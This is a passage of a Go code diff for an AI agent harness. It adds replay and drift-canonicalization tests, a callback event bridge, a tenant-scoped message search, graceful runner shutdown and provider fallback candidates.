+		{Type: "tool.call.started", Step: 1, Payload: map[string]any{
+			"call_id": "call_x", "tool": "bash", "arguments": `{"cmd":"ls"}`,
+		}},
+		// NOTE: key is "output" (runner emit key), NOT "result".
+		{Type: "tool.call.completed", Step: 1, Payload: map[string]any{
+			"call_id": "call_x", "tool": "bash", "output": "file_a.go\nfile_b.go",
+		}},
+		{Type: "llm.turn.completed", Step: 2, Payload: map[string]any{
+			"content": "Here are the files",
+		}},
+		{Type: "run.completed", Step: 3, Payload: map[string]any{"output": "done"}},
+	}
+
+	// --- Replay: the tool.call.started event's Details["result"] must be non-empty.
+	replayResult := Replay(events)
+
+	// Find the tool.call.started ReplayEvent (index 2 after run.started + llm.turn).
+	var startedEv *ReplayEvent
+	for i := range replayResult.Events {
+		if replayResult.Events[i].EventType == "tool.call.started" {
+			startedEv = &replayResult.Events[i]
+			break
+		}
+	}
+	if startedEv == nil {
+		t.Fatal("T-F0: no tool.call.started event found in ReplayResult.Events")
+	}
+	if got, _ := startedEv.Details["result"].(string); got == "" {
+		t.Errorf("T-F0 Replay: Details[\"result\"] is empty; replayer read \"result\" key but runner emits \"output\" — fallback missing")
+	}
+
+	// --- ReconstructMessages: the tool message Content must be non-empty.
+	msgs := ReconstructMessages(events, 3)
+
+	var toolMsg *harness.Message
+	for i := range msgs {
+		if msgs[i].Role == "tool" {
+			toolMsg = &msgs[i]
+			break
+		}
+	}
+	if toolMsg == nil {
+		t.Fatal("T-F0 ReconstructMessages: no tool-role message found")
+	}
+	if toolMsg.Content == "" {
+		t.Errorf("T-F0 ReconstructMessages: tool message Content is empty; replayer read \"result\" key but runner emits \"output\" — fallback missing")
 	}
 }
 

--- a/internal/forensics/replay/testdata/rollouts/simple-no-tool.jsonl
+++ b/internal/forensics/replay/testdata/rollouts/simple-no-tool.jsonl
@@ -1,0 +1,3 @@
+{"ts":"2026-01-15T10:00:00Z","seq":1,"type":"run.started","data":{"step":0,"prompt":"What is 2+2?","system_prompt":"You are a helpful assistant."}}
+{"ts":"2026-01-15T10:00:01Z","seq":2,"type":"llm.turn.completed","data":{"step":1,"content":"2+2 equals 4."}}
+{"ts":"2026-01-15T10:00:02Z","seq":3,"type":"run.completed","data":{"step":2,"output":"2+2 equals 4."}}

--- a/internal/forensics/replay/testdata/rollouts/tool-with-output-key.jsonl
+++ b/internal/forensics/replay/testdata/rollouts/tool-with-output-key.jsonl
@@ -1,0 +1,6 @@
+{"ts":"2026-01-15T10:01:00Z","seq":1,"type":"run.started","data":{"step":0,"prompt":"List files in /tmp"}}
+{"ts":"2026-01-15T10:01:01Z","seq":2,"type":"llm.turn.completed","data":{"step":1,"content":"I will list the files for you.","tool_calls":[{"id":"call_abc123","name":"bash","arguments":"{\"cmd\":\"ls /tmp\"}"}]}}
+{"ts":"2026-01-15T10:01:02Z","seq":3,"type":"tool.call.started","data":{"step":1,"call_id":"call_abc123","tool":"bash","arguments":"{\"cmd\":\"ls /tmp\"}"}}
+{"ts":"2026-01-15T10:01:03Z","seq":4,"type":"tool.call.completed","data":{"step":1,"call_id":"call_abc123","tool":"bash","output":"file_a.txt\nfile_b.log\nfile_c.go"}}
+{"ts":"2026-01-15T10:01:04Z","seq":5,"type":"llm.turn.completed","data":{"step":2,"content":"Here are the files in /tmp: file_a.txt, file_b.log, file_c.go."}}
+{"ts":"2026-01-15T10:01:05Z","seq":6,"type":"run.completed","data":{"step":3,"output":"Listed files successfully."}}

--- a/internal/forensics/rollout/canonicalizer.go
+++ b/internal/forensics/rollout/canonicalizer.go
@@ -39,6 +39,44 @@ type CanonicalizationOptions struct {
 	StripTimestamps bool
 	StripRunIDs     bool
 	StripEventIDs   bool
+	// StripPerRunConversationID strips "conversation_id" from event payloads.
+	// conversation_id CAN be a stable cross-run identifier (multi-turn
+	// conversations reuse one conversation_id), so DefaultOptions leaves it
+	// intact. DriftOptions sets this to true because a drift re-run always
+	// gets a fresh run/conversation ID, so stripping it is required for the
+	// re-run to match the original.
+	StripPerRunConversationID bool
+	// StripVolatileLLMMeta removes per-call LLM metadata that varies run-to-run
+	// even when the harness behaves identically — wall-clock timings
+	// (total_duration_ms, ttft_ms, latency_ms), the provider name, the
+	// prompt_hash, and the model_version. These are part of the VARIABLE side of
+	// the replay drift contract (see replay.DriftOptions / replay.DetectDrift):
+	// they are stripped before diffing so that pricing/model/provider/timing
+	// drift is not mistaken for harness drift. Deterministic content (assistant
+	// content, tool name/arguments, tool results, outcome) is never stripped.
+	StripVolatileLLMMeta bool
+}
+
+// volatileLLMMetaKeys are the per-call metadata keys removed when
+// StripVolatileLLMMeta is set. They vary between otherwise-identical runs.
+//
+// The first group is per-LLM-call metadata (provider/model/prompt identity and
+// the LLM-call timings). The wall-clock group (*_ms) covers EVERY wall-clock
+// timing the runner emits, not just LLM-call timings: step_start_ms is an
+// absolute epoch timestamp and duration_ms is an elapsed wall-clock measurement,
+// both of which differ run-to-run even when the harness behaves identically.
+// They are the same VARIABLE class as total_duration_ms/ttft_ms/latency_ms in
+// the drift contract and must be stripped so timing noise is not mistaken for
+// harness drift.
+var volatileLLMMetaKeys = []string{
+	"total_duration_ms",
+	"ttft_ms",
+	"latency_ms",
+	"step_start_ms",
+	"duration_ms",
+	"provider",
+	"prompt_hash",
+	"model_version",
 }
 
 // DefaultOptions strips timestamps, run IDs, and event IDs for comparison.
@@ -46,6 +84,18 @@ var DefaultOptions = CanonicalizationOptions{
 	StripTimestamps: true,
 	StripRunIDs:     true,
 	StripEventIDs:   true,
+}
+
+// DriftOptions is DefaultOptions plus StripPerRunConversationID and
+// StripVolatileLLMMeta: it strips every VARIABLE field of the replay drift
+// contract so that two canonicalized streams differ only when the harness's own
+// deterministic step/decision logic diverged. Used by replay.DetectDrift.
+var DriftOptions = CanonicalizationOptions{
+	StripTimestamps:           true,
+	StripRunIDs:               true,
+	StripEventIDs:             true,
+	StripPerRunConversationID: true,
+	StripVolatileLLMMeta:      true,
 }
 
 // Canonicalize returns a copy of events with non-deterministic fields stripped
@@ -89,6 +139,14 @@ func canonicalizeEvent(ev RolloutEvent, opts CanonicalizationOptions) RolloutEve
 		if opts.StripRunIDs {
 			delete(cleaned, "run_id")
 		}
+		if opts.StripPerRunConversationID {
+			// conversation_id defaults to the run id (runner.StartRun assigns
+			// run.ConversationID = run.ID when none is supplied), so it is a
+			// per-run identifier for re-run scenarios. It is only stripped when
+			// explicitly requested (DriftOptions) because conversation_id can
+			// also be a stable cross-run identifier in multi-turn conversations.
+			delete(cleaned, "conversation_id")
+		}
 		if opts.StripTimestamps {
 			delete(cleaned, "timestamp")
 			delete(cleaned, "ts")
@@ -96,6 +154,11 @@ func canonicalizeEvent(ev RolloutEvent, opts CanonicalizationOptions) RolloutEve
 		if opts.StripEventIDs {
 			delete(cleaned, "id")
 			delete(cleaned, "event_id")
+		}
+		if opts.StripVolatileLLMMeta {
+			for _, k := range volatileLLMMetaKeys {
+				delete(cleaned, k)
+			}
 		}
 		out.Payload = cleaned
 	}

--- a/internal/forensics/rollout/canonicalizer_test.go
+++ b/internal/forensics/rollout/canonicalizer_test.go
@@ -151,3 +151,134 @@ func TestCanonicalize_DoesNotMutateOriginal(t *testing.T) {
 		t.Error("original payload was mutated")
 	}
 }
+
+// T-F1a: DriftOptions must strip ONLY volatile LLM meta (and the default
+// non-deterministic fields), while preserving deterministic content: assistant
+// content, tool name/arguments, and outcome-bearing fields.
+func TestDriftOptions_StripsVolatileMetaOnly(t *testing.T) {
+	events := []RolloutEvent{
+		{
+			ID:        "e1",
+			Type:      "llm.turn.completed",
+			Step:      1,
+			Timestamp: time.Date(2026, 3, 12, 10, 0, 0, 0, time.UTC),
+			Payload: map[string]any{
+				// Volatile LLM meta — must be stripped.
+				"total_duration_ms": float64(1234),
+				"ttft_ms":           float64(56),
+				"latency_ms":        float64(78),
+				"provider":          "openai",
+				"prompt_hash":       "abc123",
+				"model_version":     "gpt-x-2026",
+				// Default non-deterministic — also stripped.
+				"run_id": "r1",
+				// Deterministic content — must be preserved.
+				"content": "hello world",
+				"tool":    "bash",
+			},
+		},
+	}
+
+	result := Canonicalize(events, DriftOptions)
+	if len(result) != 1 {
+		t.Fatalf("expected 1 event, got %d", len(result))
+	}
+	p := result[0].Payload
+
+	for _, k := range []string{"total_duration_ms", "ttft_ms", "latency_ms", "provider", "prompt_hash", "model_version", "run_id"} {
+		if _, ok := p[k]; ok {
+			t.Errorf("expected volatile key %q stripped under DriftOptions", k)
+		}
+	}
+
+	if p["content"] != "hello world" {
+		t.Errorf("expected content preserved, got %v", p["content"])
+	}
+	if p["tool"] != "bash" {
+		t.Errorf("expected tool preserved, got %v", p["tool"])
+	}
+}
+
+// TestDefaultOptions_KeepsConversationID asserts that DefaultOptions does NOT
+// strip conversation_id. conversation_id can be a stable cross-run identifier
+// (multi-turn conversations reuse one), so it must survive DefaultOptions
+// canonicalization. Only DriftOptions (StripPerRunConversationID:true) removes
+// it, because a drift re-run always receives a fresh conversation id.
+func TestDefaultOptions_KeepsConversationID(t *testing.T) {
+	events := []RolloutEvent{
+		{
+			Type: "run.started",
+			Step: 0,
+			Payload: map[string]any{
+				"run_id":          "run-abc",
+				"conversation_id": "conv-stable-123",
+			},
+		},
+	}
+
+	result := Canonicalize(events, DefaultOptions)
+	p := result[0].Payload
+
+	// run_id must be stripped (StripRunIDs:true).
+	if _, ok := p["run_id"]; ok {
+		t.Errorf("DefaultOptions must strip run_id")
+	}
+	// conversation_id must be KEPT (StripPerRunConversationID is false in DefaultOptions).
+	if _, ok := p["conversation_id"]; !ok {
+		t.Errorf("DefaultOptions must NOT strip conversation_id; it was unexpectedly removed")
+	}
+	if p["conversation_id"] != "conv-stable-123" {
+		t.Errorf("conversation_id value altered: got %v", p["conversation_id"])
+	}
+}
+
+// TestDriftOptions_StripsConversationID asserts that DriftOptions strips
+// conversation_id (StripPerRunConversationID:true), because a drift re-run
+// always gets a fresh run/conversation id and stripping is required for the
+// re-run to match the original.
+func TestDriftOptions_StripsConversationID(t *testing.T) {
+	events := []RolloutEvent{
+		{
+			Type: "run.started",
+			Step: 0,
+			Payload: map[string]any{
+				"run_id":          "run-xyz",
+				"conversation_id": "conv-xyz",
+			},
+		},
+	}
+
+	result := Canonicalize(events, DriftOptions)
+	p := result[0].Payload
+
+	if _, ok := p["run_id"]; ok {
+		t.Errorf("DriftOptions must strip run_id")
+	}
+	if _, ok := p["conversation_id"]; ok {
+		t.Errorf("DriftOptions must strip conversation_id; got %v", p["conversation_id"])
+	}
+}
+
+// DriftOptions must NOT strip volatile meta unless StripVolatileLLMMeta is set:
+// DefaultOptions leaves the volatile LLM-meta keys intact.
+func TestDefaultOptions_KeepsVolatileMeta(t *testing.T) {
+	events := []RolloutEvent{
+		{
+			Type: "llm.turn.completed",
+			Step: 1,
+			Payload: map[string]any{
+				"provider":          "openai",
+				"total_duration_ms": float64(1234),
+			},
+		},
+	}
+
+	result := Canonicalize(events, DefaultOptions)
+	p := result[0].Payload
+	if p["provider"] != "openai" {
+		t.Errorf("DefaultOptions should keep provider, got %v", p["provider"])
+	}
+	if p["total_duration_ms"] != float64(1234) {
+		t.Errorf("DefaultOptions should keep total_duration_ms, got %v", p["total_duration_ms"])
+	}
+}

--- a/internal/harness/callback_bridge.go
+++ b/internal/harness/callback_bridge.go
@@ -1,0 +1,131 @@
+package harness
+
+import (
+	"sync"
+	"time"
+
+	htools "go-agent-harness/internal/harness/tools"
+)
+
+// CallbackEventBridge forwards delayed-callback lifecycle events
+// (callback.scheduled / callback.fired / callback.canceled) from a
+// tools.CallbackManager onto the originating run's event stream so they are
+// observable on the live SSE stream.
+//
+// Observability semantics:
+//
+//   - callback.scheduled is emitted synchronously while the agent's
+//     set_delayed_callback tool call is executing, i.e. DURING the originating
+//     run. The run is live, so the bridge resolves it by conversation ID and
+//     the event is observable on that run's SSE stream in real time.
+//   - callback.fired and callback.canceled may occur after the originating run
+//     has ended (the timer fires, or the manager is shut down). If a live run
+//     still exists for the conversation the event is emitted there; otherwise
+//     there is no open stream to deliver it to and the bridge is a no-op for
+//     SSE. The event is still delivered to the sink at the unit level (T3).
+//
+// The runner is bound lazily because the CallbackManager is constructed before
+// the Runner exists (the same chicken-and-egg the callbackRunStarter solves).
+// A nil runner makes Emit a no-op.
+type CallbackEventBridge struct {
+	mu     sync.RWMutex
+	runner *Runner
+}
+
+// NewCallbackEventBridge returns an unbound bridge. Call BindRunner once the
+// Runner has been constructed.
+func NewCallbackEventBridge() *CallbackEventBridge {
+	return &CallbackEventBridge{}
+}
+
+// NewCallbackManager builds a tools.CallbackManager whose lifecycle events are,
+// by default, bridged onto the originating run's SSE stream via this Runner.
+// Use this when the Runner already exists. When the manager must be constructed
+// before the Runner (as in harnessd's startup), construct a
+// CallbackEventBridge, pass it via tools.WithEventSink, and call BindRunner
+// once the Runner is built.
+func (r *Runner) NewCallbackManager(starter htools.RunStarter, opts ...htools.CallbackOption) *htools.CallbackManager {
+	bridge := NewCallbackEventBridge()
+	bridge.BindRunner(r)
+	all := make([]htools.CallbackOption, 0, len(opts)+1)
+	all = append(all, htools.WithEventSink(bridge))
+	all = append(all, opts...)
+	return htools.NewCallbackManager(starter, all...)
+}
+
+// BindRunner attaches the Runner the bridge forwards events to. Safe to call
+// once, after the Runner is built.
+func (b *CallbackEventBridge) BindRunner(r *Runner) {
+	b.mu.Lock()
+	b.runner = r
+	b.mu.Unlock()
+}
+
+// Emit implements tools.CallbackEvents. It resolves a live run for the
+// callback's conversation and emits the event there. If no runner is bound or
+// no live run exists for the conversation, Emit is a no-op (the event has no
+// open SSE stream to be delivered on).
+func (b *CallbackEventBridge) Emit(event string, info htools.CallbackInfo) {
+	b.mu.RLock()
+	r := b.runner
+	b.mu.RUnlock()
+	if r == nil {
+		return
+	}
+	r.emitCallbackEvent(event, info)
+}
+
+// emitCallbackEvent resolves the live run that owns the callback's conversation
+// and emits the lifecycle event on it. No-op when no live run is found.
+func (r *Runner) emitCallbackEvent(event string, info htools.CallbackInfo) {
+	runID, ok := r.liveRunForConversation(info.ConversationID)
+	if !ok {
+		return
+	}
+	r.emit(runID, EventType(event), callbackEventPayload(info))
+}
+
+// liveRunForConversation returns the ID of the most-recently-created
+// non-terminated run whose conversation matches convID, if one exists.
+// When multiple live runs share a conversation (rare), picking the newest
+// ensures the event is delivered to the run that scheduled the callback —
+// the set_delayed_callback tool call always originates from the most-recent
+// run on the conversation.  When there is 0 or 1 match the result is
+// identical to the previous unordered iteration.
+func (r *Runner) liveRunForConversation(convID string) (string, bool) {
+	if convID == "" {
+		return "", false
+	}
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+	var (
+		bestID string
+		bestAt time.Time
+	)
+	for id, state := range r.runs {
+		if state == nil || state.terminated {
+			continue
+		}
+		if state.run.ConversationID != convID {
+			continue
+		}
+		if bestID == "" || state.run.CreatedAt.After(bestAt) {
+			bestID = id
+			bestAt = state.run.CreatedAt
+		}
+	}
+	return bestID, bestID != ""
+}
+
+// callbackEventPayload builds the SSE payload for a callback lifecycle event.
+func callbackEventPayload(info htools.CallbackInfo) map[string]any {
+	return map[string]any{
+		"callback_id":     info.ID,
+		"conversation_id": info.ConversationID,
+		"state":           string(info.State),
+		"delay":           info.Delay,
+		"prompt":          info.Prompt,
+		"fires_at":        info.FiresAt,
+		"created_at":      info.CreatedAt,
+	}
+}

--- a/internal/harness/conversation_store.go
+++ b/internal/harness/conversation_store.go
@@ -63,7 +63,10 @@ type ConversationStore interface {
 	GetConversationOwner(ctx context.Context, convID string) (*Conversation, error)
 	// SearchMessages performs a full-text search over message content.
 	// Returns up to limit results ordered by relevance. Returns empty slice (not error) for no matches.
-	SearchMessages(ctx context.Context, query string, limit int) ([]MessageSearchResult, error)
+	// When tenantID is non-empty, results are restricted to conversations owned by
+	// that tenant (cross-tenant search-leak prevention). An empty tenantID disables
+	// the tenant filter and searches all conversations (auth-disabled callers).
+	SearchMessages(ctx context.Context, tenantID, query string, limit int) ([]MessageSearchResult, error)
 	// DeleteOldConversations removes all non-pinned conversations whose updated_at is
 	// before the given threshold. Returns the number of conversations deleted.
 	// A zero threshold is a no-op (returns 0, nil) to prevent accidental mass deletion.

--- a/internal/harness/conversation_store_sqlite.go
+++ b/internal/harness/conversation_store_sqlite.go
@@ -578,20 +578,39 @@ VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
 }
 
 // SearchMessages performs a full-text search over message content using the FTS5 index.
-func (s *SQLiteConversationStore) SearchMessages(ctx context.Context, query string, limit int) ([]MessageSearchResult, error) {
+// When tenantID is non-empty, results are restricted to conversations owned by that
+// tenant by joining the FTS hits against the conversations table on conversation_id.
+// An empty tenantID disables the filter (auth-disabled callers).
+func (s *SQLiteConversationStore) SearchMessages(ctx context.Context, tenantID, query string, limit int) ([]MessageSearchResult, error) {
 	if query == "" {
 		return []MessageSearchResult{}, nil
 	}
 	if limit <= 0 {
 		limit = 20
 	}
-	rows, err := s.db.QueryContext(ctx, `
-SELECT conversation_id, role, snippet(conversation_messages_fts, 2, '<b>', '</b>', '…', 20)
-FROM conversation_messages_fts
-WHERE conversation_messages_fts MATCH ?
-ORDER BY rank
-LIMIT ?
-`, query, limit)
+
+	// The FTS table does not carry tenant_id (it indexes message content only), so
+	// scope by joining FTS hits to the owning conversation row.
+	sqlText := `
+SELECT f.conversation_id, f.role, snippet(conversation_messages_fts, 2, '<b>', '</b>', '…', 20)
+FROM conversation_messages_fts f
+`
+	args := []any{}
+	if tenantID != "" {
+		sqlText += `JOIN conversations c ON c.id = f.conversation_id
+WHERE conversation_messages_fts MATCH ? AND c.tenant_id = ?
+`
+		args = append(args, query, tenantID)
+	} else {
+		sqlText += `WHERE conversation_messages_fts MATCH ?
+`
+		args = append(args, query)
+	}
+	sqlText += `ORDER BY rank
+LIMIT ?`
+	args = append(args, limit)
+
+	rows, err := s.db.QueryContext(ctx, sqlText, args...)
 	if err != nil {
 		return nil, fmt.Errorf("search messages: %w", err)
 	}

--- a/internal/harness/conversation_store_sqlite_test.go
+++ b/internal/harness/conversation_store_sqlite_test.go
@@ -678,7 +678,7 @@ func TestSearchMessages_EmptyQuery(t *testing.T) {
 	t.Parallel()
 
 	db := newTestConversationStore(t)
-	results, err := db.SearchMessages(context.Background(), "", 10)
+	results, err := db.SearchMessages(context.Background(), "", "", 10)
 	if err != nil {
 		t.Fatalf("SearchMessages with empty query: %v", err)
 	}
@@ -698,7 +698,7 @@ func TestSearchMessages_NoMatch(t *testing.T) {
 		t.Fatalf("save: %v", err)
 	}
 
-	results, err := db.SearchMessages(context.Background(), "elephant", 10)
+	results, err := db.SearchMessages(context.Background(), "", "elephant", 10)
 	if err != nil {
 		t.Fatalf("SearchMessages: %v", err)
 	}
@@ -719,7 +719,7 @@ func TestSearchMessages_Match(t *testing.T) {
 		t.Fatalf("save: %v", err)
 	}
 
-	results, err := db.SearchMessages(context.Background(), "fox", 10)
+	results, err := db.SearchMessages(context.Background(), "", "fox", 10)
 	if err != nil {
 		t.Fatalf("SearchMessages: %v", err)
 	}
@@ -752,7 +752,7 @@ func TestSearchMessages_LimitEnforced(t *testing.T) {
 		}
 	}
 
-	results, err := db.SearchMessages(context.Background(), "needle", 3)
+	results, err := db.SearchMessages(context.Background(), "", "needle", 3)
 	if err != nil {
 		t.Fatalf("SearchMessages: %v", err)
 	}
@@ -773,7 +773,7 @@ func TestSearchMessages_DefaultLimit(t *testing.T) {
 	}
 
 	// limit=0 should use the default (20).
-	results, err := db.SearchMessages(context.Background(), "searchable", 0)
+	results, err := db.SearchMessages(context.Background(), "", "searchable", 0)
 	if err != nil {
 		t.Fatalf("SearchMessages: %v", err)
 	}
@@ -797,7 +797,7 @@ func TestSearchMessages_CrossConversation(t *testing.T) {
 		}
 	}
 
-	results, err := db.SearchMessages(context.Background(), "cherry", 10)
+	results, err := db.SearchMessages(context.Background(), "", "cherry", 10)
 	if err != nil {
 		t.Fatalf("SearchMessages: %v", err)
 	}
@@ -1060,6 +1060,7 @@ func TestConversationStoreSaveConversationWithCost_MigrationIdempotent(t *testin
 		t.Fatalf("SaveConversationWithCost after double migrate: %v", err)
 	}
 }
+
 // Issue #35: workspace/tenant scoping tests
 // ---------------------------------------------------------------------------
 

--- a/internal/harness/runner.go
+++ b/internal/harness/runner.go
@@ -19,6 +19,7 @@ import (
 	"go-agent-harness/internal/forensics/audittrail"
 	"go-agent-harness/internal/forensics/contextwindow"
 	"go-agent-harness/internal/forensics/errorchain"
+	"go-agent-harness/internal/forensics/redaction"
 	"go-agent-harness/internal/forensics/tooldecision"
 	htools "go-agent-harness/internal/harness/tools"
 	om "go-agent-harness/internal/observationalmemory"
@@ -190,6 +191,9 @@ var (
 	// supplies a ConversationID that exists but belongs to a different
 	// tenant or agent (cross-tenant/cross-agent disclosure prevention).
 	ErrConversationAccessDenied = errors.New("conversation access denied")
+	// ErrRunnerClosed is returned by StartRun and ContinueRun when Shutdown
+	// has already been called on the runner.
+	ErrRunnerClosed = errors.New("runner is closed")
 )
 
 // steeringBufferSize is the capacity of the per-run steering message channel.
@@ -256,6 +260,17 @@ type Runner struct {
 	// runQueue is a FIFO channel of pending (runID, req) pairs waiting for a
 	// worker slot. It is only used when workerSem is non-nil.
 	runQueue chan queuedRun
+
+	// done is closed by Shutdown to signal poolDispatcher and enqueueRun to stop.
+	// It is allocated in NewRunner so it is always non-nil; closing it is the
+	// shutdown trigger.
+	done chan struct{}
+	// shutdownOnce ensures close(done) happens exactly once even if Shutdown is
+	// called concurrently from multiple goroutines.
+	shutdownOnce sync.Once
+	// inflight counts goroutines currently inside execute() (or executeWithRelease).
+	// Shutdown waits until this reaches zero before returning.
+	inflight sync.WaitGroup
 }
 
 func NewRunner(provider Provider, tools *Registry, config RunnerConfig) *Runner {
@@ -322,6 +337,7 @@ func NewRunner(provider Provider, tools *Registry, config RunnerConfig) *Runner 
 		runs:               make(map[string]*runState),
 		conversations:      make(map[string][]Message),
 		conversationOwners: make(map[string]conversationOwner),
+		done:               make(chan struct{}),
 	}
 	if config.WorkerPoolSize > 0 {
 		// Bounded pool: workerSem acts as a counting semaphore.
@@ -363,59 +379,152 @@ func (r *Runner) toolsForRun(runID string) *Registry {
 }
 
 // poolDispatcher is the long-running goroutine that drains runQueue and
-// dispatches work as worker slots become available. It exits when runQueue
-// is closed (which happens implicitly when the process exits; there is no
-// explicit shutdown path needed for this goroutine's lifetime).
+// dispatches work as worker slots become available. It exits when r.done is
+// closed (via Shutdown) or when runQueue delivers its zero value with ok==false
+// (defensive; runQueue is never closed in practice — use r.done to stop).
 //
-// Each iteration blocks on workerSem (acquiring a token == occupying a slot),
-// then reads the next item from runQueue and starts execute() in a goroutine.
-// execute() defers releaseWorker, which returns the token when it finishes.
+// Each iteration acquires a worker slot (workerSem), reads the next item from
+// runQueue, and starts execute() in a goroutine. execute() defers
+// releaseWorker, which returns the token when it finishes.
+//
+// On shutdown, poolDispatcher drains any items that were enqueued into the
+// buffered runQueue after r.done was closed (the enqueueRun select is not
+// atomic, so a small number of items may race in). Each such item had
+// r.inflight.Add(1) called by dispatchRun before enqueue, so we must call
+// r.inflight.Done() once per drained item to allow Shutdown's Wait to complete.
 func (r *Runner) poolDispatcher() {
-	for item := range r.runQueue {
-		// Acquire a worker slot. This blocks when all slots are occupied,
-		// naturally serializing pending items until a slot frees up.
-		r.workerSem <- struct{}{}
-		// Mark transition from queued → running before launching the goroutine
-		// so that the status is accurate by the time the caller's goroutine
-		// observes it.
-		go r.executeWithRelease(item.runID, item.req)
+	for {
+		select {
+		case <-r.done:
+			// Drain any items that raced into the buffer after done was closed.
+			// Each was counted in r.inflight by dispatchRun; account for them now.
+			for {
+				select {
+				case _, ok := <-r.runQueue:
+					if !ok {
+						return
+					}
+					r.inflight.Done()
+				default:
+					return
+				}
+			}
+		case item, ok := <-r.runQueue:
+			if !ok {
+				return
+			}
+			// Acquire a worker slot. This blocks when all slots are occupied,
+			// naturally serializing pending items until a slot frees up.
+			// Check done again while waiting for a slot so Shutdown can
+			// interrupt a poolDispatcher that is blocked on a full semaphore.
+			select {
+			case <-r.done:
+				// Also drain here: we dequeued one item and are about to exit.
+				r.inflight.Done()
+				for {
+					select {
+					case _, ok := <-r.runQueue:
+						if !ok {
+							return
+						}
+						r.inflight.Done()
+					default:
+						return
+					}
+				}
+			case r.workerSem <- struct{}{}:
+			}
+			// Mark transition from queued → running before launching the goroutine
+			// so that the status is accurate by the time the caller's goroutine
+			// observes it.
+			go r.executeWithRelease(item.runID, item.req)
+		}
 	}
 }
 
-// executeWithRelease wraps execute() to return the worker slot on exit.
+// executeWithRelease wraps execute() to return the worker slot on exit and
+// to decrement r.inflight (which was incremented by the caller before launch).
 func (r *Runner) executeWithRelease(runID string, req RunRequest) {
+	defer r.inflight.Done()
 	defer func() { <-r.workerSem }()
 	r.execute(runID, req)
 }
 
 // enqueueRun places a run in the queue and emits run.queued.
-// Called from StartRun/ContinueRun when the pool is bounded.
-func (r *Runner) enqueueRun(runID string, req RunRequest) {
+// Called from dispatchRun when the pool is bounded and no slot is immediately
+// available. Returns ErrRunnerClosed if Shutdown has been called.
+//
+// The non-blocking done check before the send narrows (but cannot fully
+// eliminate) the window where a send races with Shutdown. The load-bearing
+// fix for the residual race is poolDispatcher's drain-on-exit logic, which
+// accounts for any items that slip through.
+func (r *Runner) enqueueRun(runID string, req RunRequest) error {
+	// Prioritized fast-path: if done is already closed, reject immediately
+	// before emitting run.queued or touching the buffered channel.
+	select {
+	case <-r.done:
+		return ErrRunnerClosed
+	default:
+	}
 	r.emit(runID, EventRunQueued, map[string]any{"prompt": req.Prompt})
-	r.runQueue <- queuedRun{runID: runID, req: req}
+	select {
+	case <-r.done:
+		return ErrRunnerClosed
+	case r.runQueue <- queuedRun{runID: runID, req: req}:
+		return nil
+	}
 }
 
 // dispatchRun either launches execute() directly (unbounded mode) or enqueues
 // the run for the pool dispatcher (bounded mode). It is the single call site
 // that replaces the bare "go r.execute(...)" pattern.
-func (r *Runner) dispatchRun(runID string, req RunRequest) {
+// Returns ErrRunnerClosed if Shutdown has been called.
+func (r *Runner) dispatchRun(runID string, req RunRequest) error {
+	// Reject immediately if the runner has been shut down.
+	select {
+	case <-r.done:
+		return ErrRunnerClosed
+	default:
+	}
+
 	if r.workerSem == nil {
 		// Unbounded mode: legacy behaviour — start immediately.
-		go r.execute(runID, req)
-		return
+		r.inflight.Add(1)
+		go func() {
+			defer r.inflight.Done()
+			r.execute(runID, req)
+		}()
+		return nil
 	}
 	// Bounded mode: try to acquire a slot without blocking.
 	select {
+	case <-r.done:
+		return ErrRunnerClosed
 	case r.workerSem <- struct{}{}:
 		// Slot available — start immediately without going through the queue.
+		r.inflight.Add(1)
 		go r.executeWithRelease(runID, req)
+		return nil
 	default:
 		// No slot available — enqueue and let poolDispatcher pick it up.
-		r.enqueueRun(runID, req)
+		// inflight is incremented here; executeWithRelease will decrement it.
+		r.inflight.Add(1)
+		if err := r.enqueueRun(runID, req); err != nil {
+			r.inflight.Done()
+			return err
+		}
+		return nil
 	}
 }
 
 func (r *Runner) StartRun(req RunRequest) (Run, error) {
+	// Fast path: reject immediately if the runner has been shut down.
+	select {
+	case <-r.done:
+		return Run{}, ErrRunnerClosed
+	default:
+	}
+
 	if r.provider == nil {
 		return Run{}, fmt.Errorf("provider is required")
 	}
@@ -583,7 +692,29 @@ func (r *Runner) StartRun(req RunRequest) (Run, error) {
 	// Persist the initial run record to the configured store (non-fatal).
 	r.storeCreateRun(run)
 
-	r.dispatchRun(run.ID, req)
+	if err := r.dispatchRun(run.ID, req); err != nil {
+		// Runner was shut down between the early check and here.  Remove the
+		// half-created run state so callers never see an orphan run.
+		// Before deleting, clean up any resources that were attached to the
+		// half-created state: the recorder goroutine and the audit writer.
+		// If we skip these, the recorder goroutine blocks forever on its
+		// channel and the audit file descriptor is never closed.
+		if state.closeRecorderOnce != nil {
+			state.closeRecorderOnce()
+		}
+		if aw != nil {
+			_ = aw.Close()
+		}
+		r.mu.Lock()
+		// Zero out auditWriter so that closeAuditWriter on a concurrent path
+		// is a no-op (we already closed it above).
+		if s, ok := r.runs[run.ID]; ok {
+			s.auditWriter = nil
+		}
+		delete(r.runs, run.ID)
+		r.mu.Unlock()
+		return Run{}, err
+	}
 
 	return run, nil
 }
@@ -674,11 +805,23 @@ func (r *Runner) resolveSystemPrompt(req RunRequest, model, workspacePath string
 	return resolved.StaticPrompt, &resolved, nil
 }
 
+// providerCandidate is a resolved provider that may be attempted during a run.
+// Index 0 is always the primary (what resolveProvider returns today); indices
+// 1..n are fallback candidates populated when AllowFallback is true.
+type providerCandidate struct {
+	Provider Provider
+	Name     string
+}
+
 type runPreflightResult struct {
-	model                  string
-	primaryModel           string
-	activeProvider         Provider
-	providerName           string
+	model          string
+	primaryModel   string
+	activeProvider Provider
+	providerName   string
+	// providerCandidates is the ordered list of providers to attempt for each
+	// LLM turn.  Index 0 is the primary (identical to activeProvider/providerName).
+	// Subsequent entries are fallbacks, populated only when AllowFallback is true.
+	providerCandidates     []providerCandidate
 	systemPrompt           string
 	resolvedPrompt         *systemprompt.ResolvedPrompt
 	runStartedAt           time.Time
@@ -804,10 +947,12 @@ func (r *Runner) runPreflight(ctx context.Context, runID string, req RunRequest)
 		primaryModel = roleModels.Primary
 	}
 
-	activeProvider, providerName, err := r.resolveProvider(runID, model, req.ProviderName, req.AllowFallback)
+	candidates, err := r.resolveProviderCandidates(runID, model, req.ProviderName, req.AllowFallback, req.FallbackProviders)
 	if err != nil {
 		return nil, err
 	}
+	activeProvider := candidates[0].Provider
+	providerName := candidates[0].Name
 
 	// Set provider name and resolved role models on run state.
 	// resolvedRoleModels is stored so that autoCompactMessages can honour the
